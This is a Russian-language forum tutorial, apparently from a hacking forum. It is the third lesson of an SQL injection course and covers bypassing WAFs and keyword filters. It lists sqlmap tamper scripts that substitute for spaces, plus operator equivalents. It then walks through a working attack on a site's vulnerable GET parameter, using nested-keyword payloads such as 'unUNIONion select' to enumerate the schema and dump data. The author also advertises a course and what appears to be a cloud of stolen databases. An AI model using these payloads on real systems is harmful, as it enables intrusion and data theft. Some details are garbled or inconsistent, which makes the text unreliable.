SQL INJECTION от новичка до профессионала (Урок третий) waf bypass

Приветствую вас на своем третьем уроке по SQL INJECTION.В этом уроке я расскажу вам про WAF и способы его обойти.А перед этим небольшая рекламка:
мой курс по sql inj - https://zelenka.guru/threads/5012873/
мое облако с базами - https://zelenka.guru/threads/5029036/

Для начало стоит понимать , что WAF это некое средство защиты для сайта , которое проверяет входящие запросы и фильтрует их.Также разработчик может поставить свои фильтры с помощью PHP кода и регулярных выражений.То есть в чем задача разработчика , он знает , что хакер использует такие ключевые выражения как:union,select,database,or,and И тому подобное.Проще всего показать суть задачи разраба в текстовом редакторе...

То есть заменяем эти слова на пустоту без учета регистра.

То есть получается вот такая "полезная" нагрузка , которая не сработает:podumai:
Но представим , что разработчик кривой и забыл указать , что без учета регистра заменять.То есть вот так!

Тогда мы можем просто написать uNion Select Database , ВЕДЬ SQL язык регистронезавимый.Ну ладно , это не интересно.Давайте перейдем к случаю , если регистр отсутствует.
Тогда мы можем обойти этот фильтр.То есть , что происходит удаляются слова , верно ? Значит мы можем по сути разбить одно ключевое слово на два и всунуть между ними полное слово.Тогда полное слово заменится на пустоту , произойдет конкатенация ( объединение) строк и запрос сработает.То есть например вот так:

И вот что будет:

То есть запрос сработает.Мы обошли фильтр:)
Полезно знать также аналог дефолтного синтаксиса вашей СУБД ( у меня MySql) НАПРИМЕР
or = ||
and = %26%26
-- - = ;0x00
database = schema
И если наш запрос не срабатывает , то просто меняем синтаксис нашего запроса
Но что делать , если разраб просто запретит использовать пробелы.По сути мы можем использовать sqlmap tamper для обхода WAF , просто подобрав нужный с помощью софта atlas или любого другого , но они не совсем корректно показывают какие тамперы срабатывают , а какие нет.Поэтому нужно учиться самостоятельно.Аналоги пробелов:
appendnullbyte.py

Function: Space ==> %00
bluecoat.py

Function: Space ==> %09
halfversionedmorekeywords.py

Function: Space ==> /*!0
space2comment.py

Function: Space ==> /**/
space2dash.py

Function: Space==> -nVNaVoPYeva% 0A

Platform:MSSQL、SQLite
space2mssqlblank.py

Function: Space ==> %23%0A
Platform: Mssql、Mysql
space2mysqlblank.py

Function: Space ==> %2B, %0D, %0C
Platform: Mysql5.1
space2mysqldash.py

Function: Space==> –%0A

Platform: Mssql、Mysql

Вообщем вариантом куча.

Погнали к практике

Допустим есть вот такой сайтик и уязвимость в GET параметре.Введем одинарную кавычку , чтобы убедиться в этом:)

Попробуем определить кол-во колонок и заодно обрамление , кто не знает , что такое обрамление читайте предыдущую мою статью.Вводим в уязвимый параметр

'order by 1,2,3,4,5,6,7,8 -- -

SQL

'order by 1,2,3,4,5,6,7,8 -- -

можно больше цифр.

Что я могу сказать , что блокируется оператор or.Попробуем поменять регистр на Or.

Опять мимо.Значит делаем загрузку по-другому 'ooRrder by 1,2,3,4,5,6,7,8 -- -

Мы обошли фильтр , но полезная нагрузка не отработала , т.к обрамление подобрано неверно.Меняем запрос на

') ooRrder by 1,2,3,4,5,6,7,8 -- -

SQL

') ooRrder by 1,2,3,4,5,6,7,8 -- -

Отлично.Что мы узнали?Во первых для всех последующих запросов обрамление будет ') И бд содержит одну колонку , а также блокируется оператор or.
Теперь давайте определим название бд.Попробуем вот так:
') union select database() -- -

union тоже блочится.Меняем запрос

') unUNIONion select database() -- -

SQL

') unUNIONion select database() -- -

Попробуем определить название таблиц.Как мы знаем union и or ЗАПРЕЩЕНЫ.Поэтому составляем вот такой запрос

') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' -- -

SQL

') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' -- -

Если таблиц больше одной , то добавляем limit , Т.К одну таблицу мы получили , то вторую можем получить вот так

') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' limit 1,1 -- -

SQL

') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' limit 1,1 -- -

Теперь можно получить и название этой одной колонки...

') unUNIONion select column_name from infoORrmation_schema.columns where table_name = 'oORrbuz' -- -

SQL

') unUNIONion select column_name from infoORrmation_schema.columns where table_name = 'oORrbuz' -- -

у нас есть название бд , таблицы , колонки.Теперь можно и забрать содержимое:)

') unUNIONion select id from Grisha.oORrbuz limit 0,1 -- -

SQL

') unUNIONion select id from Grisha.oORrbuz  limit 0,1  -- -

Что мы узнали для техники UNION:
1)С помощью order by МЫ определяем кол-во колонок в запросе , которые будут использоваться , а в таблице их может быть хоть 100
2)Кол-во колонок должно совпадать для UNION , если два , то два меньше или больше нельзя , будет ошибка
3)UNION имеет непредсказуемый вывод и может меняться параметр где угодно


Если вам понравилась статья , то пишите отзывы буду рад прочитать